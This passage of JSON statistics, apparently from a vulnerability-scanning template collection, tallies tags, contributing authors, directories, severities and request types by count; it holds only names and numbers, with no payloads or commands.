vtech","count":1},{"name":"labtech","count":1},{"name":"discord","count":1},{"name":"anchorcms","count":1},{"name":"mailchimp","count":1},{"name":"kafdrop","count":1},{"name":"livezilla","count":1},{"name":"darkstat","count":1},{"name":"codemeter","count":1},{"name":"hortonworks","count":1},{"name":"crm","count":1},{"name":"opensmtpd","count":1},{"name":"sitecore","count":1},{"name":"node","count":1},{"name":"mongoshake","count":1},{"name":"db","count":1},{"name":"servicedesk","count":1},{"name":"wamp","count":1},{"name":"alibaba","count":1},{"name":"fortinet","count":1},{"name":"blackboard","count":1},{"name":"redis","count":1},{"name":"tongda","count":1},{"name":"plastic","count":1},{"name":"dompdf","count":1},{"name":"circontrol","count":1},{"name":"checkpoint","count":1},{"name":"harbor","count":1},{"name":"dvwa","count":1},{"name":"zmanda","count":1},{"name":"st","count":1},{"name":"csod","count":1},{"name":"duomicms","count":1},{"name":"rdp","count":1},{"name":"comodo","count":1},{"name":"episerver","count":1},{"name":"opentsdb","count":1},{"name":"servicenow","count":1},{"name":"igs","count":1},{"name":"setup","count":1},{"name":"kong","count":1},{"name":"eyou","count":1},{"name":"wuzhicms","count":1},{"name":"trilithic","count":1},{"name":"geutebruck","count":1},{"name":"blind","count":1},{"name":"targa","count":1},{"name":"fastapi","count":1},{"name":"circontrorl","count":1},{"name":"kerbynet","count":1},{"name":"upnp","count":1},{"name":"b2evolution","count":1},{"name":"zarafa","count":1},{"name":"netis","count":1},{"name":"mobileiron","count":1},{"name":"keenetic","count":1},{"name":"moin","count":1},{"name":"phpunit","count":1},{"name":"htmli","count":1},{"name":"wildfly","count":1},{"name":"heroku","count":1},{"name":"wiki","count":1},{"name":"cloudinary","count":1},{"name":"tenda","count":1},{"name":"thinkadmin","count":1},{"name":"webui","count":1},{"name":"jsf","count":1},{"name":"gridx","count":1},{"name":"zend","count":1},{"name":"akamai","count":1},{"name":"gitlist","count":1},{"name":"nuuo","count":1},{"name":"doh","count":1},{"name":"74cms","count":1},{"name":"proftpd","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"tensorflow","count":1},{"name":"jitsi","count":1},{"name":"plone","count":1},{"name":"bash","count":1},{"name":"zenario","count":1},{"name":"monitorix","count":1},{"name":"ecom","count":1},{"name":"yii","count":1},{"name":"webmin","count":1},{"name":"webadmin","count":1},{"name":"ueditor","count":1},{"name":"lancom","count":1},{"name":"lanproxy","count":1},{"name":"concrete","count":1},{"name":"ilo4","count":1},{"name":"goahead","count":1},{"name":"opensns","count":1},{"name":"grav","count":1},{"name":"bolt","count":1},{"name":"netsweeper","count":1},{"name":"totaljs","count":1},{"name":"feifeicms","count":1},{"name":"flink","count":1},{"name":"finereport","count":1},{"name":"rujjie","count":1},{"name":"webmodule-ee","count":1},{"name":"fortilogger","count":1},{"name":"spring","count":1},{"name":"lansweeper","count":1},{"name":"flash","count":1},{"name":"weiphp","count":1},{"name":"vscode","count":1},{"name":"varnish","count":1},{"name":"npm","count":1},{"name":"emc","count":1},{"name":"drone","count":1},{"name":"alertmanager","count":1},{"name":"gateone","count":1},{"name":"mara","count":1},{"name":"shopxo","count":1},{"name":"jenkin","count":1},{"name":"subrion","count":1},{"name":"rmi","count":1},{"name":"powercreator","count":1},{"name":"postmessage","count":1},{"name":"liferay","count":1},{"name":"backdoor","count":1},{"name":"panos","count":1},{"name":"zte","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":79},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":13},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"aashiq","count":8},{"name":"wdahlenb","count":8},{"name":"iamthefrogy","count":8},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"melbadry9","count":7},{"name":"0x240x23elu","count":7},{"name":"techryptic (@tech)","count":7},{"name":"emadshanab","count":7},{"name":"that_juan_","count":7},{"name":"r3dg33k","count":7},{"name":"dr_set","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":5},{"name":"pentest_swissky","count":5},{"name":"caspergn","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"meme-lord","count":4},{"name":"iamnoooob","count":4},{"name":"impramodsargar","count":3},{"name":"binaryfigments","count":3},{"name":"tess","count":3},{"name":"shine","count":3},{"name":"kophjager007","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"joanbono","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"0w4ys","count":3},{"name":"davidmckennirey","count":2},{"name":"incogbyte","count":2},{"name":"kiblyn11","count":2},{"name":"0xcrypto","count":2},{"name":"emenalf","count":2},{"name":"0xelkomy","count":2},{"name":"zomsop82","count":2},{"name":"0xsapra","count":2},{"name":"joeldeleep","count":2},{"name":"shifacyclewala","count":2},{"name":"gevakun","count":2},{"name":"0xprial","count":2},{"name":"mavericknerd","count":2},{"name":"foulenzer","count":2},{"name":"elsfa7110","count":2},{"name":"ehsahil","count":2},{"name":"moritz nentwig","count":2},{"name":"jarijaas","count":2},{"name":"lu4nx","count":2},{"name":"dheerajmadhukar","count":2},{"name":"manas_harsh","count":2},{"name":"bsysop","count":2},{"name":"unstabl3","count":2},{"name":"ree4pwn","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"lotusdll","count":2},{"name":"bp0lr","count":2},{"name":"vavkamil","count":2},{"name":"afaq","count":2},{"name":"x1m_martijn","count":2},{"name":"hetroublemakr","count":2},{"name":"randomrobbie","count":2},{"name":"0xrudra","count":2},{"name":"udit_thakkur","count":2},{"name":"random-robbie","count":2},{"name":"amsda","count":2},{"name":"daviey","count":1},{"name":"_generic_human_","count":1},{"name":"0ut0fb4nd","count":1},{"name":"nkxxkn","count":1},{"name":"j33n1k4","count":1},{"name":"tim_koopmans","count":1},{"name":"naglinagli","count":1},{"name":"koti2","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"notsoevilweasel","count":1},{"name":"pdp","count":1},{"name":"geraldino2","count":1},{"name":"shelld3v","count":1},{"name":"deena","count":1},{"name":"regala_","count":1},{"name":"bjhulst","count":1},{"name":"yashgoti","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"alifathi-h1","count":1},{"name":"dogasantos","count":1},{"name":"pudsec","count":1},{"name":"shreyapohekar","count":1},{"name":"zhenwarx","count":1},{"name":"smaranchand","count":1},{"name":"elmahdi","count":1},{"name":"kabirsuda","count":1},{"name":"luskabol","count":1},{"name":"akshansh","count":1},{"name":"divya_mudgal","count":1},{"name":"alperenkesk","count":1},{"name":"@dwisiswant0","count":1},{"name":"rojanrijal","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"_harleo","count":1},{"name":"yashanand155","count":1},{"name":"ilovebinbash","count":1},{"name":"0xtavian","count":1},{"name":"raesene","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"defr0ggy","count":1},{"name":"ohlinge","count":1},{"name":"juicypotato1","count":1},{"name":"flag007","count":1},{"name":"furkansenan","count":1},{"name":"rtcms","count":1},{"name":"sicksec","count":1},{"name":"andirrahmani1","count":1},{"name":"jeya seelan","count":1},{"name":"kareemse1im","count":1},{"name":"52971","count":1},{"name":"yavolo","count":1},{"name":"johnk3r","count":1},{"name":"schniggie","count":1},{"name":"shifacyclewla","count":1},{"name":"its0x08","count":1},{"name":"mah3sec_","count":1},{"name":"mhdsamx","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"absshax","count":1},{"name":"sickwell","count":1},{"name":"fabaff","count":1},{"name":"nytr0gen","count":1},{"name":"ooooooo_q","count":1},{"name":"alph4byt3","count":1},{"name":"gboddin","count":1},{"name":"_darrenmartyn","count":1},{"name":"manuelbua","count":1},{"name":"exploitation","count":1},{"name":"dudez","count":1},{"name":"iampritam","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"rodnt","count":1},{"name":"sshell","count":1},{"name":"bad5ect0r","count":1},{"name":"johnjhacking","count":1},{"name":"alex","count":1},{"name":"fmunozs","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"sy3omda","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"vsh00t","count":1},{"name":"noamrathaus","count":1},{"name":"berkdusunur","count":1},{"name":"s1r1u5_","count":1},{"name":"knassar702","count":1},{"name":"_c0wb0y_","count":1},{"name":"fopina","count":1},{"name":"wabafet","count":1},{"name":"mohammedsaneem","count":1},{"name":"qlkwej","count":1},{"name":"ldionmarcil","count":1},{"name":"hanlaomo","count":1},{"name":"micha3lb3n","count":1},{"name":"soyelmago","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"willd96","count":1},{"name":"apt-mirror","count":1},{"name":"omarkurt","count":1},{"name":"thezakman","count":1},{"name":"d0rkerdevil","count":1},{"name":"ringo","count":1},{"name":"becivells","count":1},{"name":"tirtha_mandal","count":1},{"name":"streetofhackerr007","count":1},{"name":"ipanda","count":1},{"name":"dawid czarnecki","count":1},{"name":"ajaysenr","count":1},{"name":"cookiehanhoan","count":1},{"name":"th3.d1p4k","count":1},{"name":"blckraven","count":1},{"name":"kurohost","count":1},{"name":"c3l3si4n","count":1},{"name":"mubassirpatel","count":1},{"name":"toufik airane","count":1},{"name":"whynotke","count":1},{"name":"abison_binoy","count":1},{"name":"bing0o","count":1},{"name":"bolli95","count":1},{"name":"undefl0w","count":1},{"name":"remonsec","count":1},{"name":"0h1in9e","count":1},{"name":"taielab","count":1},{"name":"affix","count":1},{"name":"idealphase","count":1},{"name":"zandros0","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"gal nagli","count":1},{"name":"luci","count":1},{"name":"ahmed sherif","count":1},{"name":"thevillagehacker","count":1},{"name":"vzamanillo","count":1},{"name":"0xrod","count":1},{"name":"co0nan","count":1},{"name":"hakluke","count":1},{"name":"patralos","count":1},{"name":"chron0x","count":1},{"name":"r3naissance","count":1},{"name":"w4cky_","count":1},{"name":"akash.c","count":1},{"name":"b4uh0lz","count":1},{"name":"arcc","count":1},{"name":"sullo","count":1}],"directory":[{"name":"cves","count":470},{"name":"vulnerabilities","count":232},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":395},{"name":"medium","count":313},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":464},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":165},{"name":"rce","count":162},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":110},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"cve2021","count":71},{"name":"takeover","count":71},{"name":"token","count":63},{"name":"cve2018","count":62},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"iot","count":33},{"name":"network","count":32},{"name":"oracle","count":29},{"name":"sqli","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"oob","count":25},{"name":"ssrf","count":25},{"name":"disclosure","count":24},{"name":"logs","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"sap","count":14},{"name":"cve2016","count":14},{"name":"fuzz","count":13},{"name":"debug","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"misconfig","count":13},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"springboot","count":11},{"name":"dns","count":11},{"name":"zoho","count":11},{"name":"auth-bypass","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"magento","count":9},{"name":"cve2012","count":9},{"name":"dlink","count":9},{"name":"jenkins","count":9},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"cve2013","count":8},{"name":"adobe","count":8},{"name":"cnvd","count":8},{"name":"php","count":8},{"name":"aws","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"vmware","count":7},{"name":"cve2014","count":7},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"api","count":6},{"name":"nginx","count":6},{"name":"cms","count":6},{"name":"citrix","count":6},{"name":"google","count":6},{"name":"rails","count":6},{"name":"xxe","count":6},{"name":"login","count":5},{"name":"laravel","count":5},{"name":"confluence","count":5},{"name":"solr","count":5},{"name":"dell","count":5},{"name":"java","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"jetty","count":5},{"name":"solarwinds","count":4},{"name":"samsung","count":4},{"name":"hongdian","count":4},{"name":"docker","count":4},{"name":"cve2009","count":4},{"name":"artifactory","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"thinkphp","count":4},{"name":"nodejs","count":4},{"name":"router","count":4},{"name":"vpn","count":4},{"name":"asp","count":4},{"name":"django","count":4},{"name":"magmi","count":4},{"name":"webserver","count":4},{"name":"tomcat","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"netgear","count":4},{"name":"jolokia","count":4},{"name":"ibm","count":4},{"name":"fileupload","count":4},{"name":"terramaster","count":3},{"name":"bypass","count":3},{"name":"git","count":3},{"name":"ofbiz","count":3},{"name":"fanruan","count":3},{"name":"printer","count":3},{"name":"lfr","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"nacos","count":3},{"name":"fpd","count":3},{"name":"backups","count":3},{"name":"openssh","count":3},{"name":"springcloud","count":3},{"name":"amazon","count":3},{"name":"microstrategy","count":3},{"name":"vbulletin","count":3},{"name":"slack","count":3},{"name":"ebs","count":3},{"name":"dedecms","count":3},{"name":"caucho","count":3},{"name":"kubernetes","count":3},{"name":"mongodb","count":3},{"name":"deserialization","count":3},{"name":"resin","count":3},{"name":"ssh","count":3},{"name":"windows","count":3},{"name":"kafka","count":3},{"name":"log","count":3},{"name":"nosqli","count":3},{"name":"crlf","count":3},{"name":"oa","count":3},{"name":"microsoft","count":2},{"name":"rockmongo","count":2},{"name":"cache","count":2},{"name":"intrusive","count":2},{"name":"globalprotect","count":2},{"name":"jboss","count":2},{"name":"openam","count":2},{"name":"openfire","count":2},{"name":"mail","count":2},{"name":"exposures","count":2},{"name":"pega","count":2},{"name":"fortios","count":2},{"name":"keycloak","count":2},{"name":"proxy","count":2},{"name":"oauth","count":2},{"name":"plesk","count":2},{"name":"xxljob","count":2},{"name":"rockethchat","count":2},{"name":"vrealize","count":2},{"name":"splunk","count":2},{"name":"waf","count":2},{"name":"frp","count":2},{"name":"ucmdb","count":2},{"name":"seeyon","count":2},{"name":"prometheus","count":2},{"name":"webcam","count":2},{"name":"spark","count":2},{"name":"injection","count":2},{"name":"emerge","count":2},{"name":"paloalto","count":2},{"name":"hpe","count":2},{"name":"kentico","count":2},{"name":"rstudio","count":2},{"name":"flir","count":2},{"name":"bigip","count":2},{"name":"natshell","count":2},{"name":"ecology","count":2},{"name":"activemq","count":2},{"name":"hp","count":2},{"name":"nagios","count":2},{"name":"icewarp","count":2},{"name":"maian","count":2},{"name":"coldfusion","count":2},{"name":"smtp","count":2},{"name":"dos","count":2},{"name":"nexus","count":2},{"name":"saltstack","count":2},{"name":"smb","count":2},{"name":"couchdb","count":2},{"name":"odoo","count":2},{"name":"zabbix","count":2},{"name":"httpd","count":2},{"name":"kibana","count":2},{"name":"idrac","count":2},{"name":"leak","count":2},{"name":"telerik","count":2},{"name":"glassfish","count":2},{"name":"strapi","count":2},{"name":"nextjs","count":2},{"name":"sonarqube","count":2},{"name":"sonicwall","count":2},{"name":"voipmonitor","count":2},{"name":"sharepoint","count":2},{"name":"wordfence","count":2},{"name":"zhiyuan","count":2},{"name":"jellyfin","count":2},{"name":"hjtcloud","count":2},{"name":"shellshock","count":2},{"name":"huawei","count":2},{"name":"trixbox","count":2},{"name":"chamilo","count":2},{"name":"bitrix","count":2},{"name":"hashicorp","count":2},{"name":"cve2008","count":2},{"name":"yapi","count":2},{"name":"service","count":2},{"name":"showdoc","count":2},{"name":"mida","count":2},{"name":"email","count":1},{"name":"zimbra","count":1},{"name":"moinmoin","count":1},{"name":"mpsec","count":1},{"name":"upnp","count":1},{"name":"jquery","count":1},{"name":"csod","count":1},{"name":"gateone","count":1},{"name":"etouch","count":1},{"name":"sidekiq","count":1},{"name":"xff","count":1},{"name":"expn","count":1},{"name":"wildfly","count":1},{"name":"openstack","count":1},{"name":"nordex","count":1},{"name":"webmin","count":1},{"name":"trilithic","count":1},{"name":"optiLink","count":1},{"name":"node","count":1},{"name":"robomongo","count":1},{"name":"idemia","count":1},{"name":"spring","count":1},{"name":"pyramid","count":1},{"name":"blackboard","count":1},{"name":"hadoop","count":1},{"name":"pgadmin","count":1},{"name":"favicon","count":1},{"name":"mediumish","count":1},{"name":"payara","count":1},{"name":"interlib","count":1},{"name":"netrc","count":1},{"name":"fedora","count":1},{"name":"floc","count":1},{"name":"maccmsv10","count":1},{"name":"heroku","count":1},{"name":"aspnuke","count":1},{"name":"yachtcontrol","count":1},{"name":"upload","count":1},{"name":"gogs","count":1},{"name":"tpshop","count":1},{"name":"spidercontrol","count":1},{"name":"backdoor","count":1},{"name":"redis","count":1},{"name":"tapestry","count":1},{"name":"jeewms","count":1},{"name":"timeclock","count":1},{"name":"bullwark","count":1},{"name":"ricoh","count":1},{"name":"emby","count":1},{"name":"socomec","count":1},{"name":"realteo","count":1},{"name":"checkpoint","count":1},{"name":"rmc","count":1},{"name":"wuzhicms","count":1},{"name":"ioncube","count":1},{"name":"domxss","count":1},{"name":"timesheet","count":1},{"name":"grails","count":1},{"name":"zend","count":1},{"name":"tongda","count":1},{"name":"hortonworks","count":1},{"name":"panabit","count":1},{"name":"db","count":1},{"name":"doh","count":1},{"name":"csrf","count":1},{"name":"zcms","count":1},{"name":"nps","count":1},{"name":"ilo4","count":1},{"name":"postgres","count":1},{"name":"calendarix","count":1},{"name":"majordomo2","count":1},{"name":"kerbynet","count":1},{"name":"dvr","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"xml","count":1},{"name":"cobub","count":1},{"name":"starttls","count":1},{"name":"clockwatch","count":1},{"name":"ntopng","count":1},{"name":"traefik","count":1},{"name":"opentsdb","count":1},{"name":"beanshell","count":1},{"name":"cve2010","count":1},{"name":"74cms","count":1},{"name":"tenda","count":1},{"name":"enum","count":1},{"name":"akamai","count":1},{"name":"circontrol","count":1},{"name":"harbor","count":1},{"name":"haproxy","count":1},{"name":"sco","count":1},{"name":"biometrics","count":1},{"name":"ruby","count":1},{"name":"dotnet","count":1},{"name":"ulterius","count":1},{"name":"primetek","count":1},{"name":"pacsone","count":1},{"name":"concrete","count":1},{"name":"faraday","count":1},{"name":"k8","count":1},{"name":"cors","count":1},{"name":"postmessage","count":1},{"name":"woocomernce","count":1},{"name":"dotnetnuke","count":1},{"name":"jnoj","count":1},{"name":"geutebruck","count":1},{"name":"yii","count":1},{"name":"b2evolution","count":1},{"name":"mcafee","count":1},{"name":"seacms","count":1},{"name":"kubeflow","count":1},{"name":"fortigate","count":1},{"name":"jsf","count":1},{"name":"ssltls","count":1},{"name":"bolt","count":1},{"name":"wavemaker","count":1},{"name":"apiman","count":1},{"name":"mailchimp","count":1},{"name":"nedi","count":1},{"name":"plc","count":1},{"name":"sqlite","count":1},{"name":"linkedin","count":1},{"name":"skywalking","count":1},{"name":"razor","count":1},{"name":"cloudflare","count":1},{"name":"emc","count":1},{"name":"ecom","count":1},{"name":"rhymix","count":1},{"name":"drone","count":1},{"name":"dompdf","count":1},{"name":"appweb","count":1},{"name":"nomad","count":1},{"name":"webmodule-ee","count":1},{"name":"esmtp","count":1},{"name":"aura","count":1},{"name":"cse","count":1},{"name":"salesforce","count":1},{"name":"opencast","count":1},{"name":"targa","count":1},{"name":"pulsesecure","count":1},{"name":"jsp","count":1},{"name":"jfrog","count":1},{"name":"jmx","count":1},{"name":"centos","count":1},{"name":"ganglia","count":1},{"name":"wp-theme","count":1},{"name":"monitorr","count":1},{"name":"vsftpd","count":1},{"name":"zmanda","count":1},{"name":"rdp","count":1},{"name":"jenzabar","count":1},{"name":"octobercms","count":1},{"name":"blue-ocean","count":1},{"name":"nuuo","count":1},{"name":"ambari","count":1},{"name":"circontrorl","count":1},{"name":"swagger","count":1},{"name":"cve2005","count":1},{"name":"flash","count":1},{"name":"chinaunicom","count":1},{"name":"node-red-dashboard","count":1},{"name":"jenkin","count":1},{"name":"zenario","count":1},{"name":"extractor","count":1},{"name":"bookstack","count":1},{"name":"tensorflow","count":1},{"name":"fastcgi","count":1},{"name":"dom","count":1},{"name":"monitorix","count":1},{"name":"liferay","count":1},{"name":"netsweeper","count":1},{"name":"acme","count":1},{"name":"status","count":1},{"name":"klog","count":1},{"name":"visionhub","count":1},{"name":"wazuh","count":1},{"name":"firebase","count":1},{"name":"ssl","count":1},{"name":"plugin","count":1},{"name":"javafaces","count":1},{"name":"fiori","count":1},{"name":"springframework","count":1},{"name":"turbocrm","count":1},{"name":"erp-nc","count":1},{"name":"mirai","count":1},{"name":"smartsense","count":1},{"name":"lanproxy","count":1},{"name":"landrayoa","count":1},{"name":"hasura","count":1},{"name":"cgi","count":1},{"name":"opensmtpd","count":1},{"name":"proftpd","count":1},{"name":"st","count":1},{"name":"dvwa","count":1},{"name":"feifeicms","count":1},{"name":"shopware","count":1},{"name":"alerta","count":1},{"name":"eyou","count":1},{"name":"sentry","count":1},{"name":"sarg","count":1},{"name":"mysql","count":1},{"name":"weiphp","count":1},{"name":"kafdrop","count":1},{"name":"phalcon","count":1},{"name":"thinkadmin","count":1},{"name":"adminer","count":1},{"name":"tensorboard","count":1},{"name":"itop","count":1},{"name":"arl","count":1},{"name":"cve2007","count":1},{"name":"zte","count":1},{"name":"ems","count":1},{"name":"webadmin","count":1},{"name":"fuelcms","count":1},{"name":"tileserver","count":1},{"name":"moin","count":1},{"name":"netdata","count":1},{"name":"rfi","count":1},{"name":"totaljs","count":1},{"name":"druid","count":1},{"name":"phpinfo","count":1},{"name":"cocoon","count":1},{"name":"htmli","count":1},{"name":"wamp","count":1},{"name":"stem","count":1},{"name":"mautic","count":1},{"name":"wmt","count":1},{"name":"javamelody","count":1},{"name":"nsasg","count":1},{"name":"pippoint","count":1},{"name":"opensns","count":1},{"name":"openrestry","count":1},{"name":"goahead","count":1},{"name":"soar","count":1},{"name":"ueditor","count":1},{"name":"landray","count":1},{"name":"zarafa","count":1},{"name":"2014","count":1},{"name":"octoprint","count":1},{"name":"lotuscms","count":1},{"name":"gloo","count":1},{"name":"avalanche","count":1},{"name":"xdcms","count":1},{"name":"linksys","count":1},{"name":"clave","count":1},{"name":"nc2","count":1},{"name":"bitly","count":1},{"name":"viewlinc","count":1},{"name":"tika","count":1},{"name":"gitlist","count":1},{"name":"plastic","count":1},{"name":"darkstat","count":1},{"name":"opm","count":1},{"name":"k8s","count":1},{"name":"codemeter","count":1},{"name":"netis","count":1},{"name":"kyan","count":1},{"name":"linkerd","count":1},{"name":"fortilogger","count":1},{"name":"webui","count":1},{"name":"tamronos","count":1},{"name":"spf","count":1},{"name":"cloudinary","count":1},{"name":"zzzcms","count":1},{"name":"shopxo","count":1},{"name":"glances","count":1},{"name":"wiki","count":1},{"name":"webftp","count":1},{"name":"ec2","count":1},{"name":"nexusdb","count":1},{"name":"npm","count":1},{"name":"axis","count":1},{"name":"finereport","count":1},{"name":"parentlink","count":1},{"name":"enumeration","count":1},{"name":"wifisky","count":1},{"name":"szhe","count":1},{"name":"krweb","count":1},{"name":"triconsole","count":1},{"name":"livezilla","count":1},{"name":"selea","count":1},{"name":"svnserve","count":1},{"name":"rabbitmq","count":1},{"name":"rsyncd","count":1},{"name":"synnefo","count":1},{"name":"dlogin","count":1},{"name":"uwsgi","count":1},{"name":"phpunit","count":1},{"name":"empirecms","count":1},{"name":"mongoshake","count":1},{"name":"plone","count":1},{"name":"kong","count":1},{"name":"rubedo","count":1},{"name":"wooyun","count":1},{"name":"flink","count":1},{"name":"comodo","count":1},{"name":"vsphere","count":1},{"name":"panos","count":1},{"name":"azure","count":1},{"name":"wso2","count":1},{"name":"nette","count":1},{"name":"xiuno","count":1},{"name":"anchorcms","count":1},{"name":"svn","count":1},{"name":"zookeeper","count":1},{"name":"redhat","count":1},{"name":"keenetic","count":1},{"name":"saltapi","count":1},{"name":"mdb","count":1},{"name":"acexy","count":1},{"name":"redwood","count":1},{"name":"bash","count":1},{"name":"horde","count":1},{"name":"servicedesk","count":1},{"name":"duomicms","count":1},{"name":"portainer","count":1},{"name":"myucms","count":1},{"name":"setup","count":1},{"name":"gridx","count":1},{"name":"zeroshell","count":1},{"name":"scs","count":1},{"name":"mongo","count":1},{"name":"symfony","count":1},{"name":"varnish","count":1},{"name":"metinfo","count":1},{"name":"embedthis","count":1},{"name":"lansweeper","count":1},{"name":"nuxeo","count":1},{"name":"rmi","count":1},{"name":"grav","count":1},{"name":"xunchi","count":1},{"name":"mara","count":1},{"name":"blind","count":1},{"name":"spectracom","count":1},{"name":"openerp","count":1},{"name":"crm","count":1},{"name":"servicenow","count":1},{"name":"discord","count":1},{"name":"clusterengine","count":1},{"name":"jitsi","count":1},{"name":"exchange","count":1},{"name":"bruteforce","count":1},{"name":"lancom","count":1},{"name":"javascript","count":1},{"name":"vscode","count":1},{"name":"labtech","count":1},{"name":"sitecore","count":1},{"name":"rujjie","count":1},{"name":"sprintful","count":1},{"name":"fortigates","count":1},{"name":"igs","count":1},{"name":"zm","count":1},{"name":"oscommerce","count":1},{"name":"memcached","count":1},{"name":"fortiweb","count":1},{"name":"episerver","count":1},{"name":"huijietong","count":1},{"name":"mobileiron","count":1},{"name":"alibaba","count":1},{"name":"fortinet","count":1},{"name":"diris","count":1},{"name":"mantisbt","count":1},{"name":"viewpoint","count":1},{"name":"geddy","count":1},{"name":"avtech","count":1},{"name":"subrion","count":1},{"name":"fastapi","count":1},{"name":"discourse","count":1},{"name":"powercreator","count":1},{"name":"ns","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":79},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":36},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"techbrunchfr","count":13},{"name":"milo2012","count":13},{"name":"suman_kar","count":12},{"name":"pr3r00t","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":8},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"r3dg33k","count":7},{"name":"0x240x23elu","count":7},{"name":"dr_set","count":7},{"name":"melbadry9","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"that_juan_","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"yanyun","count":5},{"name":"caspergn","count":5},{"name":"puzzlepeaches","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"rootxharsh","count":4},{"name":"meme-lord","count":4},{"name":"iamnoooob","count":4},{"name":"z3bd","count":3},{"name":"f1tz","count":3},{"name":"kophjager007","count":3},{"name":"0w4ys","count":3},{"name":"joanbono","count":3},{"name":"impramodsargar","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"yash anand 